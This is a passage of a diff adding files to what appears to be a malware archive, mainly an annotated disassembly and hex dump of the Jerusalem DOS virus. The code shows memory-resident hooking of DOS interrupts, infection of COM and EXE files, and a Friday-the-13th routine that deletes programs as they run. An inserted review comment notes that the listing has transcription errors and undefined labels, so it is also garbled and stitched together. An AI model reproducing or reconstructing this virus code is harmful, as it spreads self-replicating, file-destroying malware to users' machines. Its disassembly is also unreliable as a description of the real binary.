56 57 1E 06 FC 8B FA 32-D2 80 7D 01 3A 75 05 8A VW..|.z2R.}.:u.. +;0460 15 80 E2 1F B4 36 CD 21-3D FF FF 75 03 E9 77 02 ..b.46M!=..u.iw. +;0470 F7 E3 F7 E1 0B D2 75 05-3D 10 07 72 F0 2E 8B 16 wcwa.Ru.=..rp... +;0480 80 00 1E 07 32 C0 B9 41-00 F2 AE 2E 8B 36 80 00 ....2@9A.r...6.. +;0490 8A 04 0A C0 74 0E 3C 61-72 07 3C 7A 77 03 80 2C ...@t...s&u. +;0520 B4 3E CD 21 E9 C0 01 B8-24 35 CD 21 89 1E 1B 00 4>M!i@.8$5M!.... +;0530 8C 06 1D 00 BA 1B 02 B8-24 25 CD 21 C5 16 80 00 ....:..8$%M!E... +;0540 33 C9 B8 01 43 CD 21 72-3B 2E 8B 1E 70 00 B4 3E 3I8.CM!r;...p.4> +;0550 CD 21 2E C7 06 70 00 FF-FF B8 02 3D CD 21 72 24 M!.G.p...8.=M!r$ +;0560 2E A3 70 00 8C C8 8E D8-8E C0 8B 1E 70 00 B8 00 .#p..H.X.@..p.8. 
+;0570 57 CD 21 89 16 74 00 89-0E 76 00 B8 00 42 33 C9 WM!..t...v.8.B3I +;0580 8B D1 CD 21 72 3D 80 3E-4E 00 00 74 03 EB 57 90 .QM!r=.>N..t.kW. +;0590 BB 00 10 B4 48 CD 21 73-0B B4 3E 8B 1E 70 00 CD ;..4HM!s.4>..p.M +;05A0 21 E9 43 01 FF 06 8F 00-8E C0 33 F6 8B FE B9 10 !iC......@3v.~9. +;05B0 07 F3 A4 8B D7 8B 0E 11-00 8B 1E 70 00 06 1F B4 .s$.W......p...4 +;05C0 3F CD 21 72 1C 03 F9 33-C9 8B D1 B8 00 42 CD 21 ?M!r..y3I.Q8.BM! +;05D0 BE 05 00 B9 05 00 F3 2E-A4 8B CF 33 D2 B4 40 CD >..9..s.$.O3R4@M +;05E0 21 72 0D E9 BC 00 B9 1C-00 BA 4F 00 B4 3F CD 21 !r.i<.9..:O.4?M! +;05F0 72 4A C7 06 61 00 84 19-A1 5D 00 A3 45 00 A1 5F rJG.a...!].#E.!_ +;0600 00 A3 43 00 A1 63 00 A3-47 00 A1 65 00 A3 49 00 .#C.!c.#G.!e.#I. +;0610 A1 53 00 83 3E 51 00 00-74 01 48 F7 26 78 00 03 !S..>Q..t.Hw&x.. +;0620 06 51 00 83 D2 00 05 0F-00 83 D2 00 25 F0 FF A3 .Q..R.....R.%p.# +;0630 7C 00 89 16 7E 00 05 10-07 83 D2 00 72 3A F7 36 |...~.....R.r:w6 +;0640 78 00 0B D2 74 01 40 A3-53 00 89 16 51 00 A1 7C x..Rt.@#S...Q.!| +;0650 00 8B 16 7E 00 F7 36 7A-00 2B 06 57 00 A3 65 00 ...~.w6z.+.W.#e. +;0660 C7 06 63 00 C5 00 A3 5D-00 C7 06 5F 00 10 07 33 G.c.E.#].G._...3 +;0670 C9 8B D1 B8 00 42 CD 21-72 0A B9 1C 00 BA 4F 00 I.Q8.BM!r.9..:O. +;0680 B4 40 CD 21 72 11 3B C1-75 18 8B 16 7C 00 8B 0E 4@M!r.;Au...|... +;0690 7E 00 B8 00 42 CD 21 72-09 33 D2 B9 10 07 B4 40 ~.8.BM!r.3R9..4@ +;06A0 CD 21 2E 83 3E 8F 00 00-74 04 B4 49 CD 21 2E 83 M!..>...t.4IM!.. +;06B0 3E 70 00 FF 74 31 2E 8B-1E 70 00 2E 8B 16 74 00 >p..t1...p....t. +;06C0 2E 8B 0E 76 00 B8 01 57-CD 21 B4 3E CD 21 2E C5 ...v.8.WM!4>M!.E +;06D0 16 80 00 2E 8B 0E 72 00-B8 01 43 CD 21 2E C5 16 ......r.8.CM!.E. +;06E0 1B 00 B8 24 25 CD 21 07-1F 5F 5E 5A 59 5B 58 9D ..8$%M!.._^ZY[X. +;06F0 2E FF 2E 17 00 00 00 00-00 00 00 00 00 00 00 00 ................ +;0700 4D 00 00 0F 00 00 00 00-00 00 00 00 00 00 00 00 M............... +;0710 CD 20 0B 1B 00 9A F0 FE-1D F0 2F 01 0E 0A 3C 01 M ....p~.p/...<. 
+;0720 0E 0A EB 04 0E 0A 0E 0A-01 01 01 00 02 FF FF FF ..k............. +;0730 FF FF FF FF FF FF FF FF-FF FF FF FF DD 0A 0C 16 ............]... +;0740 52 0B 14 00 18 00 52 0B-FF FF FF FF 00 00 00 00 R.....R......... +;0750 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +;0760 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 M!K.......... +;0770 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 ..... +;0780 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........ +;0790 00 0D 62 3A 0D 62 6F 2E-2A 20 62 3A 0D 00 00 00 ..b:.bo.* b:.... +;07A0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 01 00 ................ +;07B0 17 D0 01 00 01 00 17 D0-01 00 01 00 17 D0 02 00 .P.....P.....P.. +;07C0 01 00 17 D0 02 00 01 00-87 CF 00 00 05 00 FF FF ...P.....O...... +;07D0 EA CF 01 00 17 D0 07 00-01 00 6C 15 08 25 A5 FE jO...P....l..%%~ +;07E0 BC 07 1E 02 10 07 6C 15-8E 17 2F 01 04 7F 70 00 <.....l.../...p. +;07F0 10 07 40 00 82 08 88 17-A5 16 1B 02 8E 17 02 02 ..@.....%....... +;0800 4D 15 18 05 00 00 00 00-00 00 00 00 00 00 00 00 M............... 
+;<<<<<<<<<< ORIGINAL CODE BEGINS HERE
+;0810 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;0820 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;0830 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;0840 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;0850 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;0860 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;0870 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;0880 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;0890 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;08A0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;08B0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;08C0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;08D0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;08E0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;08F0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;0900 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;>>>>>>>>>> ORIGINAL CODE ENDS HERE
+;0910 4D 73 44 6F 73
+;-----------------------------------------------------------------------;
+ END
diff --git a/MSDOS/Virus.MSDOS.Unknown.isreali.lst b/MSDOS/Virus.MSDOS.Unknown.isreali.lst
new file mode 100644
index 00000000..84c88f9f
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.isreali.lst
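Review bot: The INT 08 hook at L01D8 stores the segment half of the saved vector over its offset — `MOV CS:[OLD_08],BX` followed by `MOV CS:[OLD_08],ES` — which contradicts the hunk's own byte dump at 02D8 (`2E 89 1E 13 00 2E 8C 06 15 00`, i.e. writes to 0013h and 0015h), so the second line should read `MOV CS:[OLD_08+2],ES`, exactly as the INT 21 save already does with `OLD_21+2`; as transcribed, the `JMP far CS:[OLD_08]` in NEW_08 would chain to a garbage vector and the annotated source no longer describes what the dump executes. The file also cannot be assembled to cross-check it against the dump: `HSOT_IP`, `NEW_INT_21`, `EXE_HEAD` and `A008F` are referenced but never defined (the data area declares `HOST_IP`, `NEW_21`, `EXE_HDR`, and the byte at 008Fh is only an unnamed `DB 1`), and many immediates such as `CMP AL,7A`, `MOV AX,3521` and `JMP 0000:03FC` lack the `H` suffix. A header comment stating that this is a hand-annotated disassembly rather than an assemblable source, and that the authoritative artifact is the hex dump from 0100h to 0910h at the bottom, would stop readers treating the mnemonics as ground truth. The accompanying `.lst` appears to be the same blob (same index hash 84c88f9f in its file header), so it looks like a duplicate rather than an assembler listing.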
@@ -0,0 +1,882 @@ + PAGE 64,132 +;-----------------------------------------------------------------------; +; THE "JERUSALEM" VIRUS ; +;-----------------------------------------------------------------------; + ; + ORG 100H ; + ; +;-----------------------------------------------------------------------; +; JERUSALEM VIRUS ; +;-----------------------------------------------------------------------; +BEGIN_COM: ;COM FILES START HERE + JMP CONTINUE ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +A0103 DB 073H,055H + +MS_DOS DB 'MsDos' ; + + DB 000H,001H,015H,018H + +TIME_BOMB DB 0 ;WHEN == 1 THIS FILE GETS DELETED! + + DB 000H +A0010 DB 000H + +A0011 DW 100H ;HOST SIZE (BEFORE INFECTION) + +OLD_08 DW 0FEA5H,0F000H ;OLD INT 08H VECTOR (CLOCK TIC) + +OLD_21 DW 1460H,024EH ;OLD INT 21H VECTOR +OLD_24 DW 0556H,16A5H ;001B + +A_FLAG DW 7E48H ;??? + +A0021 DB 000H,000H,000H,000H,000H,000H,000H + DB 000H,000H,000H,000H + +A002C DW 0 ;A SEGMENT + + DB 000H,000H +A0030 DB 000H + +A0031 DW 0178EH ;OLD ES VALUE + +A0033 DW 0080H ; + ; +EXEC_BLOCK DW 0 ;ENV. SEG. ADDRESS ;0035 + DW 80H ;COMMAND LINE ADDRESS + DW 178EH ;+4 + DW 005CH ;FCB #1 ADDRESS + DW 178EH ;+8 + DW 006CH ;FCB #2 ADDRESS + DW 0178EH ;+12 + ; +HOST_SP DW 0710H ;(TAKEN FROM EXE HEADER) 0043 +HOST_SS DW 347AH ;(AT TIME OF INFECTION) +HOST_IP DW 00C5H ; +HOST_CS DW 347AH ; +;CHECKSUM NOT STORED, TO UNINFECT, YOU MUST CALC IT YOURSELF + ; +A004B DW 0F010H ; +A004D DB 82H ; +A004E DB 0 ; + +EXE_HDR DB 1CH DUP (?) ;004F + +A006B DB 5 DUP (?) 
;LAST 5 BYTES OF HOST + +HANDLE DW 0005H ;0070 +HOST_ATT DW 0020H ;0072 +HOST_DATE DW 0021H ;0074 +HOST_TIME DW 002DH ;0076 + +BLOCK_SIZE DW 512 ;512 BYTES/BLOCK + +A007A DW 0010H + +HOST_SIZE DW 27C0H,0001H ;007C +HOST_NAME DW 41D9H,9B28H ;POINTER TO HOST NAME + +COMMAND_COM DB 'COMMAND.COM' + + DB 1 +A0090 DB 0,0,0,0,0 + +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +CONTINUE: ; + CLD ; + MOV AH,0E0H ;DO A ???... + INT 21H ; + ; + CMP AH,0E0H ; + JNC L01B5 ; + CMP AH,3 ; + JC L01B5 ; + ; + MOV AH,0DDH ; + MOV DI,offset BEGIN_COM ;DI = BEGINNING OF OUR (VIRUS) CODE + MOV SI,0710H ;SI = SIZE OF OUR (VIRUS) CODE + ADD SI,DI ;SI = BEGINNING OF HOST CODE + MOV CX,CS:[DI+11H] ;CX = (SIZE OF HOST CODE?) + INT 21H ; + ; +L01B5: MOV AX,CS ;TWEEK CODE SEGMENT BY 100H + ADD AX,10H ; + MOV SS,AX ;SS = TWEEKed CS + MOV SP,700H ;SP = END OF OUR CODE (VIRUS) + ; +;TWEEK CS TO MAKE IT LOOK LIKE IP STARTS AT 0, NOT 100H BY DOING A RETF + ; + PUSH AX ;JMP FAR CS+10H:IP-100H + MOV AX,offset BEGIN_EXE - offset BEGIN_COM + PUSH AX ; + RETF ; + ; +;---------------------------------------; + ORG 0C5h ; +;---------------------------------------; + ; +BEGIN_EXE: ;EXE FILES START HERE + CLD ; + PUSH ES ; + ; + MOV CS:[A0031],ES ; + MOV CS:[EXEC_BLOCK+4],ES ;INIT EXEC_BLOCK SEG VALUES + MOV CS:[EXEC_BLOCK+8],ES ; + MOV CS:[EXEC_BLOCK+12],ES ; + ; + MOV AX,ES ;TWEEK ES SAME AS CS ABOVE + ADD AX,10H ; + ADD CS:[HOST_CS],AX ; SAVE NEW ES VALUE + ADD CS:[HOST_SS],AX ; + ; + MOV AH,0E0H ; + INT 21H ; + ; + CMP AH,0E0H ; + JNC L0106 ;00F1 7313 + ; + CMP AH,3 ; + POP ES ;00F6 + MOV SS,CS:[HOST_SS] ; + MOV SP,CS:[HOST_SP] ; + JMP far CS:[HSOT_IP] ; + ; +L0106: XOR AX,AX ;0106 33C0 + MOV ES,AX ;0108 8EC0 + MOV AX,ES:[03FC] ;010A 26A1FC03 + MOV CS:[A004B],AX ;010E 2EA34B00 + MOV AL,ES:[03FE] ;0112 26A0FE03 + MOV CS:[A004D],AL ;0116 2EA24D00 + MOV Word ptr ES:[03FC],A5F3 ;011A 26C706FC03F3A5 + 
MOV Byte ptr ES:[03FE],CB ;0121 26C606FE03CB + POP AX ;0127 58 + ADD AX,10H ;0128 051000 + MOV ES,AX ;012B 8EC0 + PUSH CS ;012D 0E + POP DS ;012E 1F + MOV CX,710H ;SIZE OF VIRUS CODE + SHR CX,1 ;0132 D1E9 + XOR SI,SI ;0134 33F6 + MOV DI,SI ;0136 8BFE + PUSH ES ;0138 06 + MOV AX,0142 ;0139 B84201 + PUSH AX ;013C 50 + JMP 0000:03FC ;013D EAFC030000 + ; + MOV AX,CS ;0142 8CC8 + MOV SS,AX ;0144 8ED0 + MOV SP,700H ;0146 BC0007 + XOR AX,AX ;0149 33C0 + MOV DS,AX ;014B 8ED8 + MOV AX,CS:[A004B] ;014D 2EA14B00 + MOV [03FC],AX ;0151 A3FC03 + MOV AL,CS:[A004D] ;0154 2EA04D00 + MOV [03FE],AL ;0158 A2FE03 + MOV BX,SP ;015B 8BDC + MOV CL,04 ;015D B104 + SHR BX,CL ;015F D3EB + ADD BX,+10 ;0161 83C310 + MOV CS:[A0033],BX ; + ; + MOV AH,4AH ; + MOV ES,CS:[A0031] ; + INT 21H ;MODIFY ALLOCATED MEMORY BLOCKS + ; + MOV AX,3521 ; + INT 21H ;GET VECTOR + MOV CS:[OLD_21],BX ; + MOV CS:[OLD_21+2],ES ; + ; + PUSH CS ;0181 0E + POP DS ;0182 1F + MOV DX,offset NEW_INT_21 ;0183 BA5B02 + MOV AX,2521 ; + INT 21H ;SAVE VECTOR + ; + MOV ES,[A0031] ;018B 8E063100 + MOV ES,ES:[A002C] ;018F 268E062C00 + XOR DI,DI ;0194 33FF + MOV CX,7FFFH ;0196 B9FF7F + XOR AL,AL ;0199 32C0 + REPNE SCASB ;019C AE + CMP ES:[DI],AL ;019D 263805 + LOOPNZ 019B ;01A0 E0F9 + MOV DX,DI ;01A2 8BD7 + ADD DX,+03 ;01A4 83C203 + MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM + PUSH ES ; + POP DS ; + PUSH CS ; + POP ES ; + MOV BX,35H ; + ; + PUSH DS ;01B1 ; + PUSH ES ; + PUSH AX ; + PUSH BX ; + PUSH CX ; + PUSH DX ; + ; + MOV AH,2AH ; + INT 21H ;GET DATE + ; + MOV Byte ptr CS:[TIME_BOMB],0 ;SET "DONT DIE" + ; + CMP CX,1987 ;IF 1987... + JE L01F7 ;...JUMP + CMP AL,5 ;IF NOT FRIDAY... + JNE L01D8 ;...JUMP + CMP DL,0DH ;IF DATE IS NOT THE 13th... 
+ JNE L01D8 ;...JUMP + INC Byte ptr CS:[TIME_BOMB] ;TIC THE BOMB COUNT + JMP L01F7 ; + ; +L01D8: MOV AX,3508H ;GET CLOCK TIMER VECTOR + INT 21H ;GET VECTOR + MOV CS:[OLD_08],BX ; + MOV CS:[OLD_08],ES ; + ; + PUSH CS ;DS=CS + POP DS ; + ; + MOV Word ptr [A_FLAG],7E90H ; + ; + MOV AX,2508H ;SET NEW CLOCK TIC HANDLER + MOV DX,offset NEW_08 ; + INT 21H ;SET VECTOR + ; +L01F7: POP DX ; + POP CX ; + POP BX ; + POP AX ; + POP ES ; + POP DS ; + PUSHF ; + CALL far CS:[OLD_21] ; + PUSH DS ; + POP ES ; + ; + MOV AH,49H ; + INT 21H ;FREE ALLOCATED MEMORY + ; + MOV AH,4DH ; + INT 21H ;GET RETURN CODE OF A SUBPROCESS + ; +;---------------------------------------; +; THIS IS WHERE WE REMAIN RESIDENT ; +;---------------------------------------; + MOV AH,31H ; + MOV DX,0600H ;020F ; + MOV CL,04 ; + SHR DX,CL ; + ADD DX,10H ; + INT 21H ;TERMINATE AND REMAIN RESIDENT + ; +;---------------------------------------; +NEW_24: XOR AL,AL ;021B ;CRITICAL ERROR HANDLER + IRET ; + ; +;-----------------------------------------------------------------------; +; NEW INTERRUPT 08 (CLOCK TIC) HANDLER ; +;-----------------------------------------------------------------------; +NEW_08: CMP Word ptr CS:[A_FLAG],2 ;021E + JNE N08_10 ;IF ... JUMP + ; + PUSH AX ; + PUSH BX ; + PUSH CX ; + PUSH DX ; + PUSH BP ; + MOV AX,0602H ;SCROLL UP TWO LINES + MOV BH,87H ;INVERSE VIDEO ATTRIBUTE + MOV CX,0505H ;UPPER LEFT CORNER + MOV DX,1010H ;LOWER RIGHT CORNER + INT 10H ; + POP BP ; + POP DX ; + POP CX ; + POP BX ; + POP AX ; + ; +N08_10: DEC Word ptr CS:[A_FLAG] ;ASSURE THAT THIS ONLY HAPPENS ONCE + JNZ N08_90 ; BY RESETTING TO 1 IF EQUAL TO ZERO + MOV Word ptr CS:[A_FLAG],1 ; + ; + PUSH AX ;????? IS THIS SOME KIND OF DELAY ????? 
+ PUSH CX ;
+ PUSH SI ;
+ MOV CX,4001H ;
+ REP LODSB ;
+ POP SI ;
+ POP CX ;
+ POP AX ;
+ ;
+N08_90: JMP far CS:[OLD_08] ;PASS CONTROL TO OLD INT 08 VECTOR
+ ;
+;-----------------------------------------------------------------------;
+; NEW INTERRUPT 21 HANDLER ;
+;-----------------------------------------------------------------------;
+NEW_21: PUSHF ;025B ;
+ CMP AH,0E0H ;IF A E0 REQUEST...
+ JNE N21_10 ;
+ MOV AX,300H ;...RETURN AX = 300H
+ POPF ; (OUR PUSHF)
+ IRET ;
+ ;
+N21_10: CMP AH,0DDH ;0266 ;
+ JE N21_30 ;IF DDH...JUMP TO _30
+ CMP AH,0DEH ;
+ JE N21_40 ;IF DEH...JUMP TO _40
+ CMP AX,4B00H ;IF SPAWN A PROG...
+ JNE N21_20 ;
+ JMP N21_50 ;...JUMP TO _50
+ ;
+N21_20: POPF ; (OUR PUSHF)
+ JMP far CS:[OLD_21] ;ANY OTHER INT 21 GOES TO OLD VECTOR
+ ;
+N21_30: POP AX ;REMOVE OUR (PUSHF)
+ POP AX ;?
+ MOV AX,100H ;
+ MOV CS:[000A],AX ;
+ POP AX ;
+ MOV CS:[000C],AX ;
+ REP MOVSB ;
+ POPF ; (OUR PUSHF)
+ MOV AX,CS:[000F] ;
+ JMP far CS:[000A] ;
+ ;
+N21_40: ADD SP,+06 ;0298 ;
+ POPF ; (OUR PUSHF)
+ MOV AX,CS ;
+ MOV SS,AX ;
+ MOV SP,710H ;SIZE OF VIRUS CODE
+ PUSH ES ;
+ PUSH ES ;02A4 06
+ XOR DI,DI ;02A5 33FF
+ PUSH CS ;02A7 0E
+ POP ES ;02A8 07
+ MOV CX,0010 ;02A9 B91000
+ MOV SI,BX ;02AC 8BF3
+ MOV DI,0021 ;02AE BF2100
+ REP MOVSB ;02B2 A4
+ MOV AX,DS ;02B3 8CD8
+ MOV ES,AX ;02B5 8EC0
+ MUL Word ptr CS:[A007A] ;02B7 2EF7267A00
+ ADD AX,CS:[002B] ;02BC 2E03062B00
+ ADC DX,+00 ;02C1 83D200
+ DIV Word ptr CS:[A007A] ;02C4 2EF7367A00
+ MOV DS,AX ;02C9 8ED8
+ MOV SI,DX ;02CB 8BF2
+ MOV DI,DX ;02CD 8BFA
+ MOV BP,ES ;02CF 8CC5
+ MOV BX,CS:[002F] ;02D1 2E8B1E2F00
+ OR BX,BX ;02D6 0BDB
+ JE 02ED ;02D8 7413
+ MOV CX,8000 ;02DA B90080
+ REP MOVSW ;02DE A5
+ ADD AX,1000 ;02DF 050010
+ ADD BP,1000 ;02E2 81C50010
+ MOV DS,AX ;02E6 8ED8
+ MOV ES,BP ;02E8 8EC5
+ DEC BX ;02EA 4B
+ JNE 02DA ;02EB 75ED
+ MOV CX,CS:[002D] ;02ED 2E8B0E2D00
+ REP MOVSB ;02F3 A4
+ POP AX ;02F4 58
+ PUSH AX ;02F5 50
+ ADD AX,0010 ;02F6 051000
+ ADD CS:[0029],AX ;02F9 2E01062900
+ ADD CS:[0025],AX
;02FE 2E01062500
+ MOV AX,CS:[0021] ;0303 2EA12100
+ POP DS ;0307 1F
+ POP ES ;0308 07
+ MOV SS,CS:[0029] ;0309 2E8E162900
+ MOV SP,CS:[0027] ;030E 2E8B262700
+ JMP far CS:[0023] ;0313 2EFF2E2300
+ ;
+;---------------------------------------;
+; IT IS TIME FOR THIS FILE TO DIE... ;
+; THIS IS WHERE IT GETS DELETED ! ;
+;---------------------------------------;
+N21_5A: XOR CX,CX ;
+ MOV AX,4301H ;
+ INT 21H ;CHANGE FILE MODE (ATT=0)
+ ;
+ MOV AH,41H ;
+ INT 21H ;DELETE A FILE
+ ;
+ MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM
+ POPF ; (OUR PUSHF)
+ JMP far CS:[OLD_21] ;
+ ;
+;---------------------------------------;
+; START INFECTION ;
+;---------------------------------------;
+N21_50: CMP Byte ptr CS:[TIME_BOMB],1 ;032C ;IF TIME TO DIE...
+ JE N21_5A ;...JUMP
+ ;
+ MOV Word ptr CS:[HANDLE],-1 ;ASSUME NOT OPEN
+ MOV Word ptr CS:[A008F],0 ;
+ MOV word ptr CS:[HOST_NAME],DX ;SAVE POINTER TO FILE NAME
+ MOV word ptr CS:[HOST_NAME+2],DS ;
+ ;
+;INFECT PROCESS SEEMS TO OCCUR HERE ;
+ PUSH AX ;034C 50
+ PUSH BX ;034D 53
+ PUSH CX ;034E 51
+ PUSH DX ;034F 52
+ PUSH SI ;0350 56
+ PUSH DI ;0351 57
+ PUSH DS ;0352 1E
+ PUSH ES ;0353 06
+ CLD ;0354 FC
+ MOV DI,DX ;0355 8BFA
+ XOR DL,DL ;0357 32D2
+ CMP Byte ptr [DI+01],3A ;0359 807D013A
+ JNE L0364 ;035D 7505
+ MOV DL,[DI] ;035F 8A15
+ AND DL,1F ;0361 80E21F
+ ;
+L0364: MOV AH,36 ;
+ INT 21H ;GET DISK FREE SPACE
+ CMP AX,-1 ;0368 3DFFFF
+ JNE L0370 ;036B 7503
+L036D: JMP I_90 ;036D E97702
+ ;
+L0370: MUL BX ;0370 F7E3
+ MUL CX ;0372 F7E1
+ OR DX,DX ;0374 0BD2
+ JNE L037D ;0376 7505
+ CMP AX,710H ;0378 3D1007
+ JC L036D ;037B 72F0
+L037D: MOV DX,word ptr CS:[HOST_NAME]
+ PUSH DS ;0382 1E
+ POP ES ;0383 07
+ XOR AL,AL ;0384 32C0
+ MOV CX,41 ;0386 B94100
+ REPNE SCASB ;038A AE
+ MOV SI,word ptr CS:[HOST_NAME]
+L0390: MOV AL,[SI] ;0390 8A04
+ OR AL,AL ;0392 0AC0
+ JE L03A4 ;0394 740E
+ CMP AL,61 ;0396 3C61
+ JC L03A1 ;0398 7207
+ CMP AL,7A ;039A 3C7A
+ JA L03A1 ;039C 7703
+ SUB Byte ptr [SI],20 ;039E 802C20
+L03A1: INC SI ;03A1 46
+ JMP L0390 ;03A2 EBEC
+ ;
+L03A4: MOV CX,000B ;03A4 B90B00
+ SUB SI,CX ;03A7 2BF1
+ MOV DI,offset COMMAND_COM ;03A9 BF8400
+ PUSH CS ;03AC 0E
+ POP ES ;03AD 07
+ MOV CX,000B ;03AE B90B00
+ REPE CMPSB ;03B2 A6
+ JNE L03B8 ;03B3 7503
+ JMP I_90 ;03B5 E92F02
+ ;
+L03B8: MOV AX,4300H ;
+ INT 21H ;CHANGE FILE MODE
+ JC L03C4 ;03BD 7205
+ ;
+ MOV CS:[HOST_ATT],CX ;03BF ;
+L03C4: JC L03EB ;03C4 7225
+ XOR AL,AL ;03C6 32C0
+ MOV CS:[A004E],AL ;03C8 2EA24E00
+ PUSH DS ;03CC 1E
+ POP ES ;03CD 07
+ MOV DI,DX ;03CE 8BFA
+ MOV CX,41 ;03D0 B94100
+ REPNZ SCASB ;03D4 AE
+ CMP Byte ptr [DI-02],4D ;03D5 807DFE4D
+ JE L03E6 ;03D9 740B
+ CMP Byte ptr [DI-02],6D ;03DB 807DFE6D
+ JE L03E6 ;03DF 7405
+ INC Byte ptr CS:[A004E] ;03E1 2EFE064E00
+ ;
+L03E6: MOV AX,3D00H ;
+ INT 21H ;OPEN FILE READ ONLY
+L03EB: JC L0447 ;
+ MOV CS:[HANDLE],AX ;03ED ;
+ ;
+ MOV BX,AX ;MOVE TO END OF FILE -5
+ MOV AX,4202 ;
+ MOV CX,-1 ;FFFFFFFB
+ MOV DX,-5 ;
+ INT 21H ;MOVE FILE POINTER
+ JC L03EB ;
+ ;
+ ADD AX,5 ;0400 ;
+ MOV CS:[A0011],AX ;?SAVE HOST SIZE
+ ;
+ MOV CX,5 ;0407 ;READ LAST 5 BYTES OF HOST
+ MOV DX,offset A006B ;
+ MOV AX,CS ;
+ MOV DS,AX ;
+ MOV ES,AX ;
+ MOV AH,3FH ;
+ INT 21H ;READ FROM A FILE
+ ;
+ MOV DI,DX ;0417 ;CHECK IF LAST 5 BYTES = 'MsDos'
+ MOV SI,offset MS_DOS ;
+ REPE CMPSB ;
+ JNE L0427 ;
+ MOV AH,3E ;IF == 'MsDos'...
+ INT 21H ;CLOSE FILE
+ JMP I_90 ;...PASS CONTROL TO DOS
+ ;
+L0427: MOV AX,3524 ;GET CRITICAL ERROR VECTOR
+ INT 21H ;GET VECTOR
+ MOV [OLD_24],BX ;
+ MOV [OLD_24+2],ES ;
+ ;
+ MOV DX,offset NEW_24 ;
+ MOV AX,2524 ;SET CRITICAL ERROR VECTOR
+ INT 21H ;SET VECTOR
+ ;
+ LDS DX,dword ptr [HOST_NAME];
+ XOR CX,CX ;
+ MOV AX,4301H ;
+ INT 21H ;CHANGE FILE MODE
+L0447: JC L0484 ;
+ ;
+ MOV BX,CS:[HANDLE] ;
+ MOV AH,3E ;
+ INT 21H ;CLOSE FILE
+ ;
+ MOV Word ptr CS:[HANDLE],-1 ;CLEAR HANDLE
+ ;
+ MOV AX,3D02 ;
+ INT 21H ;OPEN FILE R/W
+ JC L0484 ;
+ ;
+ MOV CS:[HANDLE],AX ;0460 2EA37000
+ MOV AX,CS ;0464 8CC8
+ MOV DS,AX ;0466 8ED8
+ MOV ES,AX ;0468 8EC0
+ MOV BX,[HANDLE] ;046A 8B1E7000
+ MOV AX,5700 ;046E B80057
+ INT 21H ;GET/SET FILE DATE TIME
+ ;
+ MOV [HOST_DATE],DX ;0473 89167400
+ MOV [HOST_TIME],CX ;0477 890E7600
+ MOV AX,4200 ;047B B80042
+ XOR CX,CX ;047E 33C9
+ MOV DX,CX ;0480 8BD1
+ INT 21H ;MOVE FILE POINTER
+L0484: JC L04C3 ;0484 723D
+ ;
+ CMP Byte ptr [A004E],00 ;0486 803E4E0000
+ JE L0490 ;048B 7403
+ JMP L04E6 ;048D EB57
+ ;
+ NOP ;048F 90
+L0490: MOV BX,1000 ;0490 BB0010
+ MOV AH,48 ;0493 B448
+ INT 21H ;ALLOCATE MEMORY
+ JNC L04A4 ;0497 730B
+ ;
+ MOV AH,3E ;0499 B43E
+ MOV BX,[HANDLE] ;049B 8B1E7000
+ INT 21H ;CLOSE FILE
+ JMP I_90 ;04A1 E94301
+ ;
+L04A4: INC Word ptr [A008F] ;04A4 FF068F00
+ MOV ES,AX ;04A8 8EC0
+ XOR SI,SI ;04AA 33F6
+ MOV DI,SI ;04AC 8BFE
+ MOV CX,710H ;04AE B91007
+ REP MOVSB ;04B2 A4
+ MOV DX,DI ;04B3 8BD7
+ MOV CX,[A0011] ;?GET HOST SIZE
+ MOV BX,[70H] ;04B9 8B1E7000
+ PUSH ES ;04BD 06
+ POP DS ;04BE 1F
+ MOV AH,3FH ;04BF B43F
+ INT 21H ;READ FROM A FILE
+L04C3: JC L04E1 ;04C3 721C
+ ;
+ ADD DI,CX ;04C5 03F9
+ ;
+ XOR CX,CX ;POINT TO BEGINNING OF FILE
+ MOV DX,CX ;
+ MOV AX,4200H ;
+ INT 21H ;MOVE FILE POINTER
+ ;
+ MOV SI,offset MS_DOS ;04D0 BE0500
+ MOV CX,5 ;04D3 B90500
